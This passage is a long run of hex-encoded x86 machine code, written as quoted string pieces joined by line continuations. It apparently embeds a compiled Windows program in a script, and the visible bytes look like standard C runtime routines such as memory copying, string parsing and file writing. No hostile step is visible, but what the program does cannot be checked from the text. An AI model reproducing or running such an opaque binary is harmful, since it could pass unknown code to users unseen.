'ffffe81622000059663b8540e5ffff0f853b030000ff8538e5ffffff8530e5ffff8b45' \ '10398544e5ffff0f82f9fdffffe9270300008b0e8a13ff8538e5ffff88540f348b0e89' \ '440f38e90e03000033c98b0603c7f64004800f84bf0200008b8534e5ffff898d40e5ff' \ 'ff84db0f85ca00000089853ce5ffff394d100f8620030000eb068bb528e5ffff8b8d3c' \ 'e5ffff83a544e5ffff002b8d34e5ffff8d8548e5ffff3b4d1073398b953ce5ffffff85' \ '3ce5ffff8a124180fa0a7510ff8530e5ffffc6000d40ff8544e5ffff881040ff8544e5' \ 'ffff81bd44e5ffffff13000072c28bd88d8548e5ffff2bd86a008d852ce5ffff50538d' \ '8548e5ffff508b06ff3407ff153cb0400085c00f84420200008b852ce5ffff018538e5' \ 'ffff3bc30f8c3a0200008b853ce5ffff2b8534e5ffff3b45100f824cffffffe9200200' \ '00898544e5ffff80fb020f85d1000000394d100f864d020000eb068bb528e5ffff8b8d' \ '44e5ffff83a53ce5ffff002b8d34e5ffff8d8548e5ffff3b4d1073468b9544e5ffff83' \ '8544e5ffff020fb71241416683fa0a7516838530e5ffff026a0d5b668918404083853c' \ 'e5ffff0283853ce5ffff02668910404081bd3ce5fffffe13000072b58bd88d8548e5ff' \ 'ff2bd86a008d852ce5ffff50538d8548e5ffff508b06ff3407ff153cb0400085c00f84' \ '620100008b852ce5ffff018538e5ffff3bc30f8c5a0100008b8544e5ffff2b8534e5ff' \ 'ff3b45100f823fffffffe940010000394d100f867c0100008b8d44e5ffff83a53ce5ff' \ 'ff002b8d34e5ffff6a028d8548f9ffff5e3b4d10733c8b9544e5ffff0fb71201b544e5' \ 'ffff03ce6683fa0a750e6a0d5b66891803c601b53ce5ffff01b53ce5ffff66891003c6' \ '81bd3ce5ffffa806000072bf33f6565668550d00008d8df0ebffff518d8d48f9ffff2b' \ 'c1992bc2d1f8508bc1505668e9fd0000ff15f0b040008bd83bde0f84970000006a008d' \ '852ce5ffff508bc32bc6508d8435f0ebffff508b8528e5ffff8b00ff3407ff153cb040' \ '0085c0740c03b52ce5ffff3bde7fcbeb0cff1580b04000898540e5ffff3bde7f5c8b85' \ '44e5ffff2b8534e5ffff898538e5ffff3b45100f820affffffeb3f6a008d8d2ce5ffff' \ '51ff7510ffb534e5ffffff30ff153cb0400085c074158b852ce5ffff83a540e5ffff00' \ '898538e5ffffeb0cff1580b04000898540e5ffff83bd38e5ffff00756c83bd40e5ffff' \ '00742d6a055e39b540e5ffff7514e8c6b1ffffc70009000000e8ceb1ffff8930eb3fff' \ 'b540e5ffffe8d2b1ffff59eb318bb528e5ffff8b06f644070440740f8b8534e5ffff80' \ '381a750433c0eb24e886b1ffffc7001c000000e88eb1ffff83200083c8ffeb0c8b8538' \ 'e5ffff2b8530e5ffff5f5b8b4dfc33cd5ee8a69cffffc9c36a106808c84000e816afff' \ 'ff8b450883f8fe751be852b1ffff832000e837b1ffffc7000900000083c8ffe99d0000' \ '0033ff3bc77c083b05c0fc40007221e829b1ffff8938e80fb1ffffc700090000005757' \ '575757e8ecb3ffff83c414ebc98bc8c1f9058d1c8de0fc40008bf083e61fc1e6068b0b' \ '0fbe4c310483e10174bf50e8e61c000059897dfc8b03f6443004017416ff7510ff750c' \ 'ff7508e82ef8ffff83c40c8945e4eb16e8acb0ffffc70009000000e8b4b0ffff893883' \ '4de4ffc745fcfeffffffe8090000008b45e4e896aeffffc3ff7508e8301d000059c38b' \ 'ff558becff05c8f540006800100000e83eb1ffff598b4d0889410885c0740d83490c08' \ 'c7411800100000eb1183490c048d4114894108c74118020000008b4108836104008901' \ '5dc38bff558bec83ec14535657e82da2ffff8365fc00833dc4fb4000008bd80f858e00' \ '000068f0ba4000ff152cb140008bf885ff0f842a0100008b35acb0400068e4ba400057' \ 'ffd685c00f841401000050e877a1ffffc70424d4ba400057a3c4fb4000ffd650e862a1' \ 'ffffc70424c0ba400057a3c8fb4000ffd650e84da1ffffc70424a4ba400057a3ccfb40' \ '00ffd650e838a1ffff59a3d4fb400085c07414688cba400057ffd650e820a1ffff59a3' \ 'd0fb4000a1d0fb40003bc3744f391dd4fb4000744750e87ea1ffffff35d4fb40008bf0' \ 'e871a1ffff59598bf885f6742c85ff7428ffd685c074198d4df8516a0c8d4dec516a01' \ '50ffd785c07406f645f4017509814d1000002000eb39a1c8fb40003bc3743050e82ea1' \ 'ffff5985c07425ffd08945fc85c0741ca1ccfb40003bc3741350e811a1ffff5985c074' \ '08ff75fcffd08945fcff35c4fb4000e8f9a0ffff5985c07410ff7510ff750cff7508ff' \ '75fcffd0eb0233c05f5e5bc9c38bff558bec8b45085333db56573bc374078b7d0c3bfb' \ '771be8adaeffff6a165e89305353535353e88bb1ffff83c4148bc6eb3c8b75103bf375' \ '048818ebda8bd0381a7404424f75f83bfb74ee8a0e880a42463acb74034f75f33bfb75' \ '108818e866aeffff6a225989088bf1ebb533c05f5e5b5dc38bff558bec53568b750833' \ 'db57395d1475103bf37510395d0c751233c05f5e5b5dc33bf374078b7d0c3bfb771be8' \ '24aeffff6a165e89305353535353e802b1ffff83c4148bc6ebd5395d147504881eebca' \ '8b55103bd37504881eebd1837d14ff8bc6750f8a0a880840423acb741e4f75f3eb198a' \ '0a880840423acb74084f7405ff4d1475ee395d14750288183bfb758b837d14ff750f8b' \ '450c6a50885c06ff58e978ffffff881ee8aaadffff6a225989088bf1eb828bff558bec' \ '8b4d085333db56573bcb74078b7d0c3bfb771be884adffff6a165e89305353535353e8' \ '62b0ffff83c4148bc6eb308b75103bf375048819ebda8bd18a06880242463ac374034f' \ '75f33bfb75108819e849adffff6a225989088bf1ebc133c05f5e5b5dc3cc8bff558bec' \ '8b4d085633f63bce7c1e83f9027e0c83f9037514a150f24000eb28a150f24000890d50' \ 'f24000eb1be806adffff5656565656c70016000000e8e3afffff83c41483c8ff5e5dc3' \ '8bff558bec83ec10ff75088d4df0e872b2ffff0fb6450c8b4df48a55148454011d751e' \ '837d100074128b4df08b89c80000000fb70441234510eb0233c085c0740333c040807d' \ 'fc0074078b4df8836170fdc9c38bff558bec6a046a00ff75086a00e89affffff83c410' \ '5dc3cccccccc558bec57568b750c8b4d108b7d088bc18bd103c63bfe76083bf80f82a4' \ '01000081f900010000721f833de0fd4000007416575683e70f83e60f3bfe5e5f75085e' \ '5f5de98d1b0000f7c7030000007515c1e90283e20383f908722af3a5ff249514824000' \ '908bc7ba0300000083e904720c83e00303c8ff248528814000ff248d2482400090ff24' \ '8da88140009038814000648140008881400023d18a0688078a46018847018a4602c1e9' \ '0288470283c60383c70383f90872ccf3a5ff2495148240008d490023d18a0688078a46' \ '01c1e90288470183c60283c70283f90872a6f3a5ff2495148240009023d18a06880783' \ 'c601c1e90283c70183f9087288f3a5ff2495148240008d49000b824000f8814000f081' \ '4000e8814000e0814000d8814000d0814000c88140008b448ee489448fe48b448ee889' \ '448fe88b448eec89448fec8b448ef089448ff08b448ef489448ff48b448ef889448ff8' \ '8b448efc89448ffc8d048d0000000003f003f8ff2495148240008bff248240002c8240' \ '00388240004c8240008b45085e5fc9c3908a0688078b45085e5fc9c3908a0688078a46' \ '018847018b45085e5fc9c38d49008a0688078a46018847018a46028847028b45085e5f' \ 'c9c3908d7431fc8d7c39fcf7c7030000007524c1e90283e20383f908720dfdf3a5fcff' \ '2495b08340008bfff7d9ff248d608340008d49008bc7ba0300000083f904720c83e003' \ '2bc8ff2485b4824000ff248db083400090c4824000e8824000108340008a460323d188' \ '470383ee01c1e90283ef0183f90872b2fdf3a5fcff2495b08340008d49008a460323d1' \ '8847038a4602c1e90288470283ee0283ef0283f9087288fdf3a5fcff2495b083400090' \ '8a460323d18847038a46028847028a4601c1e90288470183ee0383ef0383f9080f8256' \ 'fffffffdf3a5fcff2495b08340008d4900648340006c834000748340007c8340008483' \ '40008c83400094834000a78340008b448e1c89448f1c8b448e1889448f188b448e1489' \ '448f148b448e1089448f108b448e0c89448f0c8b448e0889448f088b448e0489448f04' \ '8d048d0000000003f003f8ff2495b08340008bffc0834000c8834000d8834000ec8340' \ '008b45085e5fc9c3908a46038847038b45085e5fc9c38d49008a46038847038a460288' \ '47028b45085e5fc9c3908a46038847038a46028847028a46018847018b45085e5fc9c3' \ '8bff558bec568b750885f60f8481010000ff7604e849a9ffffff7608e841a9ffffff76' \ '0ce839a9ffffff7610e831a9ffffff7614e829a9ffffff7618e821a9ffffff36e81aa9' \ 'ffffff7620e812a9ffffff7624e80aa9ffffff7628e802a9ffffff762ce8faa8ffffff' \ '7630e8f2a8ffffff7634e8eaa8ffffff761ce8e2a8ffffff7638e8daa8ffffff763ce8' \ 'd2a8ffff83c440ff7640e8c7a8ffffff7644e8bfa8ffffff7648e8b7a8ffffff764ce8' \ 'afa8ffffff7650e8a7a8ffffff7654e89fa8ffffff7658e897a8ffffff765ce88fa8ff' \ 'ffff7660e887a8ffffff7664e87fa8ffffff7668e877a8ffffff766ce86fa8ffffff76' \ '70e867a8ffffff7674e85fa8ffffff7678e857a8ffffff767ce84fa8ffff83c440ffb6' \ '80000000e841a8ffffffb684000000e836a8ffffffb688000000e82ba8ffffffb68c00' \ '0000e820a8ffffffb690000000e815a8ffffffb694000000e80aa8ffffffb698000000' \ 'e8ffa7ffffffb69c000000e8f4a7ffffffb6a0000000e8e9a7ffffffb6a4000000e8de' \ 'a7ffffffb6a8000000e8d3a7ffff83c42c5e5dc38bff558bec568b750885f674358b06' \ '3b0558ed4000740750e8b0a7ffff598b46043b055ced4000740750e89ea7ffff598b76' \ '083b3560ed4000740756e88ca7ffff595e5dc38bff558bec568b750885f6747e8b460c' \ '3b0564ed4000740750e86aa7ffff598b46103b0568ed4000740750e858a7ffff598b46' \ '143b056ced4000740750e846a7ffff598b46183b0570ed4000740750e834a7ffff598b' \ '461c3b0574ed4000740750e822a7ffff598b46203b0578ed4000740750e810a7ffff59' \ '8b76243b357ced4000740756e8fea6ffff595e5dc38bff558bec8b450885c0741283e8' \ '088138dddd0000750750e8dda6ffff595dc3cccccc558bec5633c05050505050505050' \ '8b550c8d49008a020ac0740983c2010fab0424ebf18b750883c9ff8d490083c1018a06' \ '0ac0740983c6010fa3042473ee8bc183c4205ec9c3cccccccccccccccccccc8b542404' \ '8b4c2408f7c203000000753c8b023a01752e0ac074263a610175250ae4741dc1e8103a' \ '410275190ac074113a6103751083c10483c2040ae475d28bff33c0c3901bc0d1e083c0' \ '01c3f7c20100000074188a0283c2013a0175e783c1010ac074dcf7c20200000074a466' \ '8b0283c2023a0175ce0ac074c63a610175c50ae474bd83c102eb888bff558bec5151a1' \ '00e0400033c58945fca1dcfb4000535633db578bf93bc3753a8d45f85033f646566834' \ 'c4400056ff155cb1400085c074088935dcfb4000eb34ff1580b0400083f878750a6a02' \ '58a3dcfb4000eb05a1dcfb400083f8020f84cf0000003bc30f84c700000083f8010f85' \ 'e8000000895df8395d1875088b078b40048945188b3558b1400033c0395d205353ff75' \ '100f95c0ff750c8d04c50100000050ff7518ffd68bf83bfb0f84ab0000007e3c81fff0' \ 'ffff7f77348d443f083d000400007713e82c1500008bc43bc3741cc700cccc0000eb11' \ '50e8e6e0ffff593bc37409c700dddd000083c0088bd885db74698d043f506a0053e818' \ '93ffff83c40c5753ff7510ff750c6a01ff7518ffd685c07411ff75145053ff7508ff15' \ '5cb140008945f853e8d8fdffff8b45f859eb7533f6395d1c75088b078b401489451c39' \ '5d1875088b078b4004894518ff751ce8e31400005983f8ff750433c0eb473b4518741e' \ '53538d4d1051ff750c50ff7518e80b1500008bf083c4183bf374dc89750cff7514ff75' \ '10ff750cff7508ff751cff1554b140008bf83bf3740756e85aa4ffff598bc78d65ec5f' \ '5e5b8b4dfc33cde84a8fffffc9c38bff558bec83ec10ff75088d4df0e881a9ffffff75' \ '248d4df0ff7520ff751cff7518ff7514ff7510ff750ce816feffff83c41c807dfc0074' \ '078b4df8836170fdc9c3cccccccccccccccccccccccc558bec5633c050505050505050' \ '508b550c8d49008a020ac0740983c2010fab0424ebf18b75088bff8a060ac0740c83c6' \ '010fa3042473f18d46ff83c4205ec9c38bff558bec83ec14a100e0400033c58945fc53' \ '5633db578bf1391de0fb40007538535333ff47576834c44000680001000053ff1564b1' \ '400085c07408893de0fb4000eb15ff1580b0400083f878750ac705e0fb400002000000' \ '395d147e228b4d148b45104938187408403bcb75f683c9ff8b45142bc1483b45147d01' \ '40894514a1e0fb400083f8020f84ac0100003bc30f84a401000083f8010f85cc010000' \ '895df8395d2075088b068b40048945208b3558b1400033c0395d245353ff75140f95c0' \ 'ff75108d04c50100000050ff7520ffd68bf83bfb0f848f0100007e436ae033d258f7f7' \ '83f80272378d443f083d000400007713e8b61200008bc43bc3741cc700cccc0000eb11' \ '50e870deffff593bc37409c700dddd000083c0088945f4eb03895df4395df40f843e01' \ '000057ff75f4ff7514ff75106a01ff7520ffd685c00f84e30000008b3564b140005353' \ '57ff75f4ff750cff7508ffd68bc8894df83bcb0f84c2000000f7450c00040000742939' \ '5d1c0f84b00000003b4d1c0f8fa7000000ff751cff751857ff75f4ff750cff7508ffd6' \ 'e9900000003bcb7e456ae033d258f7f183f80272398d4409083d000400007716e8f711' \ '00008bf43bf3746ac706cccc000083c608eb1a50e8aeddffff593bc37409c700dddd00' \ '0083c0088bf0eb0233f63bf37441ff75f85657ff75f4ff750cff7508ff1564b1400085' \ 'c074225353395d1c75045353eb06ff751cff7518ff75f85653ff7520ff15f0b0400089' \ '45f856e895faffff59ff75f4e88cfaffff8b45f859e959010000895df4895df0395d08' \ '75088b068b4014894508395d2075088b068b4004894520ff7508e890110000598945ec' \ '83f8ff750733c0e9210100003b45200f84db00000053538d4d1451ff751050ff7520e8' \ 'ae11000083c4188945f43bc374d48b3560b140005353ff751450ff750cff7508ffd689' \ '45f83bc3750733f6e9b70000007e3d83f8e0773883c0083d000400007716e8e1100000' \ '8bfc3bfb74ddc707cccc000083c708eb1a50e898dcffff593bc37409c700dddd000083' \ 'c0088bf8eb0233ff3bfb74b4ff75f85357e8c88effff83c40cff75f857ff7514ff75f4' \ 'ff750cff7508ffd68945f83bc3750433f6eb25ff751c8d45f8ff75185057ff7520ff75' \ 'ece8fd1000008bf08975f083c418f7de1bf62375f857e86af9ffff59eb1aff751cff75' \ '18ff7514ff7510ff750cff7508ff1560b140008bf0395df47409ff75f4e83aa0ffff59' \ '8b45f03bc3740c394518740750e827a0ffff598bc68d65e05f5e5b8b4dfc33cde8178b' \ 'ffffc9c38bff558bec83ec10ff75088d4df0e84ea5ffffff75288d4df0ff7524ff7520' \ 'ff751cff7518ff7514ff7510ff750ce828fcffff83c420807dfc0074078b4df8836170' \ 'fdc9c36a106828c84000e8429dffff33c08b5d0833ff3bdf0f95c03bc7751de8639fff' \ 'ffc700160000005757575757e840a2ffff83c41483c8ffeb53833dbcfc40000375386a' \ '04e829c0ffff59897dfc53e82ed0ffff598945e03bc7740b8b73fc83ee098975e4eb03' \ '8b75e4c745fcfeffffffe825000000397de075105357ff35fcf94000ff1568b140008b' \ 'f08bc6e8029dffffc333ff8b5d088b75e46a04e8f7beffff59c36a02e83998ffff59c3' \ '8bff558bec81ec28030000a100e0400033c58945fcf605a0ed4000015674086a0ae868' \ 'b4ffff59e8d3cbffff85c074086a16e8d5cbffff59f605a0ed4000020f84ca00000089' \ '85e0fdffff898ddcfdffff8995d8fdffff899dd4fdffff89b5d0fdffff89bdccfdffff' \ '668c95f8fdffff668c8decfdffff668c9dc8fdffff668c85c4fdffff668ca5c0fdffff' \ '668cadbcfdffff9c8f85f0fdffff8b75048d45048985f4fdffffc78530fdffff010001' \ '0089b5e8fdffff8b40fc6a508985e4fdffff8d85d8fcffff6a0050e86b8cffff8d85d8' \ 'fcffff83c40c898528fdffff8d8530fdffff6a00c785d8fcffff1500004089b5e4fcff' \ 'ff89852cfdffffff15a0b040008d8528fdffff50ff159cb040006a03e8a799ffffcccc' \ 'cccc558bec535657556a006a0068788f4000ff7508e8461400005d5f5e5b8be55dc38b' \ '4c2404f7410406000000b80100000074328b4424148b48fc33c8e8ca88ffff558b6810' \ '8b5028528b502452e81400000083c4085d8b4424088b5424108902b803000000c35356' \ '578b44241055506afe68808f400064ff3500000000a100e0400033c4508d44240464a3' \ '000000008b4424288b58088b700c83feff743a837c242cff74063b74242c762d8d3476' \ '8b0cb3894c240c89480c837cb30400751768010100008b44b308e8490000008b44b308' \ 'e85f000000ebb78b4c240464890d0000000083c4185f5e5bc333c0648b0d0000000081' \ '7904808f400075108b510c8b520c3951087505b801000000c35351bba4ed4000eb0b53' \ '51bba4ed40008b4c240c894b08894304896b0c55515058595d595bc20400ffd0c3cccc' \ 'cccccccccccccc558bec57568b750c8b4d108b7d088bc18bd103c63bfe76083bf80f82' \ 'a401000081f900010000721f833de0fd4000007416575683e70f83e60f3bfe5e5f7508' \ '5e5f5de98d0b0000f7c7030000007515c1e90283e20383f908722af3a5ff2495149240' \ '00908bc7ba0300000083e904720c83e00303c8ff248528914000ff248d2492400090ff' \ '248da89140009038914000649140008891400023d18a0688078a46018847018a4602c1' \ 'e90288470283c60383c70383f90872ccf3a5ff2495149240008d490023d18a0688078a' \ '4601c1e90288470183c60283c70283f90872a6f3a5ff2495149240009023d18a068807' \ '83c601c1e90283c70183f9087288f3a5ff2495149240008d49000b924000f8914000f0' \ '914000e8914000e0914000d8914000d0914000c89140008b448ee489448fe48b448ee8' \ '89448fe88b448eec89448fec8b448ef089448ff08b448ef489448ff48b448ef889448f' \ 'f88b448efc89448ffc8d048d0000000003f003f8ff2495149240008bff249240002c92' \ '4000389240004c9240008b45085e5fc9c3908a0688078b45085e5fc9c3908a0688078a' \ '46018847018b45085e5fc9c38d49008a0688078a46018847018a46028847028b45085e' \ '5fc9c3908d7431fc8d7c39fcf7c7030000007524c1e90283e20383f908720dfdf3a5fc' \ 'ff2495b09340008bfff7d9ff248d609340008d49008bc7ba0300000083f904720c83e0' \ '032bc8ff2485b4924000ff248db093400090c4924000e8924000109340008a460323d1' \ '88470383ee01c1e90283ef0183f90872b2fdf3a5fcff2495b09340008d49008a460323' \ 'd18847038a4602c1e90288470283ee0283ef0283f9087288fdf3a5fcff2495b0934000' \ '908a460323d18847038a46028847028a4601c1e90288470183ee0383ef0383f9080f82' \ '56fffffffdf3a5fcff2495b09340008d4900649340006c934000749340007c93400084' \ '9340008c93400094934000a79340008b448e1c89448f1c8b448e1889448f188b448e14' \ '89448f148b448e1089448f108b448e0c89448f0c8b448e0889448f088b448e0489448f' \ '048d048d0000000003f003f8ff2495b09340008bffc0934000c8934000d8934000ec93' \ '40008b45085e5fc9c3908a46038847038b45085e5fc9c38d49008a46038847038a4602' \ '8847028b45085e5fc9c3908a46038847038a46028847028a46018847018b45085e5fc9' \ 'c38bff558bec53568b75085733ff83cbff3bf7751ce80099ffff5757575757c7001600' \ '0000e8dd9bffff83c4140bc3eb42f6460c83743756e88fd9ffff568bd8e8770d000056' \ 'e878dbffff50e89e0c000083c41085c07d0583cbffeb118b461c3bc7740a50e8f998ff' \ 'ff59897e1c897e0c8bc35f5e5b5dc36a0c6848c84000e86096ffff834de4ff33c08b75' \ '0833ff3bf70f95c03bc7751de87d98ffffc700160000005757575757e85a9bffff83c4' \ '1483c8ffeb0cf6460c40740c897e0c8b45e4e86396ffffc356e8379cffff59897dfc56' \ 'e82affffff598945e4c745fcfeffffffe805000000ebd58b750856e8859cffff59c36a' \ '106868c84000e8e495ffff8b450883f8fe7513e80d98ffffc7000900000083c8ffe9aa' \ '00000033db3bc37c083b05c0fc4000721ae8ec97ffffc700090000005353535353e8c9' \ '9affff83c414ebd08bc8c1f9058d3c8de0fc40008bf083e61fc1e6068b0f0fbe4c0e04' \ '83e10174c650e8c303000059895dfc8b07f6440604017431ff7508e8370300005950ff' \ '156cb1400085c0750bff1580b040008945e4eb03895de4395de47419e88b97ffff8b4d' \ 'e48908e86e97ffffc70009000000834de4ffc745fcfeffffffe8090000008b45e4e85f' \ '95ffffc3ff7508e8f903000059c38bff558bec83ec145657ff75088d4dece8c89cffff' \ '8b45108b750c33ff3bc7740289303bf7752ce81997ffff5757575757c70016000000e8' \ 'f699ffff83c414807df80074078b45f4836070fd33c0e9d8010000397d14740c837d14' \ '027cc9837d14247fc38b4dec538a1e897dfc8d7e0183b9ac000000017e178d45ec500f' \ 'b6c36a0850e83e0900008b4dec83c40ceb108b91c80000000fb6c30fb7044283e00885' \ 'c074058a1f47ebc780fb2d7506834d1802eb0580fb2b75038a1f478b451485c00f8c4b' \ '01000083f8010f844201000083f8240f8f3901000085c0752a80fb307409c745140a00' \ '0000eb348a073c78740d3c587409c7451408000000eb21c7451410000000eb0a83f810' \ '751380fb30750e8a073c7874043c587504478a1f478bb1c8000000b8ffffffff33d2f7' \ '75140fb6cb0fb70c4ef6c10474080fbecb83e930eb1bf7c10301000074318acb80e961' \ '80f9190fbecb770383e92083c1c93b4d147319834d18083945fc722775043bca762183' \ '4d1804837d100075238b45184fa8087520837d100074038b7d0c8365fc00eb5b8b5dfc' \ '0faf5d1403d9895dfc8a1f47eb8bbeffffff7fa804751ba801753d83e0027409817dfc' \ '00000080770985c0752b3975fc7626e87895fffff6451801c700220000007406834dfc' \ 'ffeb0ff64518026a00580f95c003c68945fc8b451085c074028938f64518027403f75d' \ 'fc807df80074078b45f4836070fd8b45fceb188b451085c074028930807df80074078b' \ '45f4836070fd33c05b5f5ec9c38bff558bec33c050ff7510ff750cff7508390550fb40' \ '0075076838e74000eb0150e8abfdffff83c4145dc38bff558bec8b4d085333db3bcb56' \ '577c5b3b0dc0fc400073538bc1c1f8058bf18d3c85e0fc40008b0783e61fc1e60603c6' \ 'f640040174358338ff7430833d10e0400001751d2bcb7410497408497513536af4eb08' \ '536af5eb03536af6ff1570b140008b07830c06ff33c0eb15e87a94ffffc70009000000' \ 'e88294ffff891883c8ff5f5e5b5dc38bff558bec8b450883f8fe7518e86694ffff8320' \ '00e84b94ffffc7000900000083c8ff5dc35633f63bc67c223b05c0fc4000731a8bc883' \ 'e01fc1f9058b0c8de0fc4000c1e00603c1f64004017524e82594ffff8930e80b94ffff' \ '5656565656c70009000000e8e896ffff83c41483c8ffeb028b005e5dc36a0c6888c840' \ '00e8ac91ffff8b7d088bc7c1f8058bf783e61fc1e606033485e0fc4000c745e4010000' \ '0033db395e0875366a0ae8a4b4ffff59895dfc395e08751a68a00f00008d460c50e8b0' \ 'c2ffff595985c07503895de4ff4608c745fcfeffffffe830000000395de4741d8bc7c1' \ 'f80583e71fc1e7068b0485e0fc40008d44380c50ff15d4b040008b45e4e86c91ffffc3' \ '33db8b7d086a0ae864b3ffff59c38bff558bec8b45088bc883e01fc1f9058b0c8de0fc' \ '4000c1e0068d44010c50ff15d8b040005dc38bff558bec83ec10a100e0400033c58945' \ 'fc5633f63935c0ed4000744f833d84ee4000fe7505e8cf070000a184ee400083f8ff75' \ '07b8ffff0000eb70568d4df0516a018d4d085150ff157cb1400085c07567833dc0ed40' \ '000275daff1580b0400083f87875cf8935c0ed400056566a058d45f4506a018d450850' \ '56ff1578b1400050ff15f0b040008b0d84ee400083f9ff74a2568d55f052508d45f450' \ '51ff1574b1400085c0748d668b45088b4dfc33cd5ee8bc7dffffc9c3c705c0ed400001' \ '000000ebe38bff558bec83ec1053568b750c33db3bf37415395d107410381e75128b45' \ '083bc3740533c966890833c05e5bc9c3ff75148d4df0e8c197ffff8b45f0395814751f' \ '8b45083bc37407660fb60e668908385dfc74078b45f8836070fd33c040ebca8d45f050' \ '0fb60650e8ebd6ffff595985c0747d8b45f08b88ac00000083f9017e25394d107c2033' \ 'd2395d080f95c252ff750851566a09ff7004ff1558b1400085c08b45f075108b4d103b' \ '88ac0000007220385e01741b8b80ac000000385dfc0f8465ffffff8b4df8836170fde9' \ '59ffffffe88c91ffffc7002a000000385dfc74078b45f8836070fd83c8ffe93affffff' \ '33c0395d080f95c050ff75088b45f06a01566a09ff7004ff1558b1400085c00f853aff' \ 'ffffebba8bff558bec6a00ff7510ff750cff7508e8d4feffff83c4105dc3558bec83ec' \ '08897dfc8975f88b750c8b7d088b4d10c1e907eb068d9b00000000660f6f06660f6f4e' \ '10660f6f5620660f6f5e30660f7f07660f7f4f10660f7f5720660f7f5f30660f6f6640' \ '660f6f6e50660f6f7660660f6f7e70660f7f6740660f7f6f50660f7f7760660f7f7f70' \ '8db6800000008dbf800000004975a38b75f88b7dfc8be55dc3558bec83ec1c897df489' \ '75f8895dfc8b5d0c8bc3998bc88b450833ca2bca83e10f33ca2bca998bf833fa2bfa83' \ 'e70f33fa2bfa8bd10bd7754a8b75108bce83e17f894de83bf174132bf1565350e827ff' \ 'ffff83c40c8b45088b4de885c974778b5d108b550c03d32bd18955ec03d82bd9895df0' \ '8b75ec8b7df08b4de8f3a48b4508eb533bcf7535f7d983c110894de48b750c8b7d088b' \ '4de4f3a48b4d08034de48b550c0355e48b45102b45e4505251e84cffffff83c40c8b45' \ '08eb1a8b750c8b7d088b4d108bd1c1e902f3a58bca83e103f3a48b45088b5dfc8b75f8' \ '8b7df48be55dc3cccccccccccccccccc518d4c24082bc883e10f03c11bc90bc159e98a' \ '7effff518d4c24082bc883e10703c11bc90bc159e9747effff8bff558bec6a0a6a00ff' \ '7508e86bfaffff83c40c5dc38bff558bec83ec0ca100e0400033c58945fc6a068d45f4' \ '506804100000ff7508c645fa00ff1550b1400085c0750583c8ffeb0a8d45f450e8aeff' \ 'ffff598b4dfc33cde8817affffc9c38bff558bec83ec34a100e0400033c58945fc8b45' \ '108b4d188945d88b4514538945d08b00568945dc8b45085733ff894dcc897de0897dd4' \ '3b450c0f845f0100008b351cb140008d4de85150ffd68b1d58b1400085c0745e837de8' \ '0175588d45e850ff750cffd685c0744b837de80175458b75dcc745d40100000083feff' \ '750cff75d8e88ed1ffff8bf059463bf77e5b81fef0ffff7f77538d4436083d00040000' \ '772fe8cefeffff8bc43bc77438c700cccc0000eb2d5757ff75dcff75d86a01ff7508ff' \ 'd38bf03bf775c333c0e9d100000050e86ccaffff593bc77409c700dddd000083c00889' \ '45e4eb03897de4397de474d88d04365057ff75e4e8967cffff83c40c56ff75e4ff75dc' \ 'ff75d86a01ff7508ffd385c0747f8b5dcc3bdf741d5757ff751c5356ff75e457ff750c' \ 'ff15f0b0400085c07460895de0eb5b8b1df0b04000397dd475145757575756ff75e457' \ 'ff750cffd38bf03bf7743c566a01e8ed8effff59598945e03bc7742b5757565056ff75' \ 'e457ff750cffd33bc7750eff75e0e8f78dffff59897de0eb0b837ddcff74058b4dd089' \ '01ff75e4e8e4e6ffff598b45e08d65c05f5e5b8b4dfc33cde8cd78ffffc9c38bff558b' \ 'ec83ec1853ff75108d4de8e80393ffff8b5d088d43013d00010000770f8b45e88b80c8' \ '0000000fb70458eb75895d08c17d08088d45e8508b450825ff00000050e82cd2ffff59' \ '5985c074128a45086a028845f8885df9c645fa0059eb0a33c9885df8c645f900418b45' \ 'e86a01ff7014ff70048d45fc50518d45f8508d45e86a0150e8f9e8ffff83c42085c075' \ '103845f474078b45f0836070fd33c0eb140fb745fc23450c807df40074078b4df08361' \ '70fd5bc9c38bff558bec568b75085756e852f8ffff5983f8ff7450a1e0fc400083fe01' \ '7509f6808400000001750b83fe02751cf640440174166a02e827f8ffff6a018bf8e81e' \ 'f8ffff59593bc7741c56e812f8ffff5950ff1574b0400085c0750aff1580b040008bf8' \ 'eb0233ff56e86ef7ffff8bc6c1f8058b0485e0fc400083e61fc1e60659c64430040085' \ 'ff740c57e85d8cffff5983c8ffeb0233c05f5e5dc36a1068a8c84000e8e989ffff8b45' \ '0883f8fe751be8258cffff832000e80a8cffffc7000900000083c8ffe98e00000033ff' \ '3bc77c083b05c0fc40007221e8fc8bffff8938e8e28bffffc700090000005757575757' \ 'e8bf8effff83c414ebc98bc8c1f9058d1c8de0fc40008bf083e61fc1e6068b0b0fbe4c' \ '310483e10174bf50e8b9f7ffff59897dfc8b03f644300401740eff7508e8cbfeffff59' \ '8945e4eb0fe8878bffffc70009000000834de4ffc745fcfeffffffe8090000008b45e4' \ 'e87889ffffc3ff7508e812f8ffff59c38bff558bec568b75088b460ca883741ea80874' \ '1aff7608e88b8bffff81660cf7fbffff33c05989068946088946045e5dc333c050506a' \ '03506a0368000000406878c44000ff1580b14000a384ee4000c3a184ee4000568b3574' \ 'b0400083f8ff740883f8fe740350ffd6a180ee400083f8ff740883f8fe740350ffd65e' \ 'c3cccccc558bec5756538b4d100bc9744d8b75088b7d0cb741b35ab6208d49008a260a' \ 'e48a0774270ac0742383c60183c7013ae772063ae3770202e63ac772063ac3770202c6' \ '3ae0750b83e90175d133c93ae07409b9ffffffff7202f7d98bc15b5e5fc9c3cccccccc' \ 'cccccccccccccccccccccc8b4424088b4c24100bc88b4c240c75098b442404f7e1c210' \ '0053f7e18bd88b442408f764241403d88b442408f7e103d35bc21000cccccccccccccc' \ 'cccccccccc8d42ff5bc38da424000000008d64240033c08a442408538bd8c1e0088b54' \ '2408f7c20300000074158a0a83c2013acb74cf84c97451f7c20300000075eb0bd8578b' \ 'c3c1e310560bd88b0abffffefe7e8bc18bf733cb03f003f983f1ff83f0ff33cf33c683' \ 'c20481e100010181751c250001018174d32500010101750881e60000008075c45e5f5b' \ '33c0c38b42fc3ac3743684c074ef3ae3742784e474e7c1e8103ac3741584c074dc3ae3' \ '740684e474d4eb965e5f8d42ff5bc38d42fe5e5f5bc38d42fd5e5f5bc38d42fc5e5f5b' \ 'c3ff2534b1400000000000000000000000000000000000000000000000000000000000' \ '0000000000000000000000000000000000000000000000000000000000000000c6cc00' \ '00a8cc00008acc000076cc000060cc000044cc000038cc00002ecc00001ccc00000ccc' \ '0000f6cb0000e6cb0000d2cb0000e2cc00000000000094cb00007ecb0000accb000066' \ 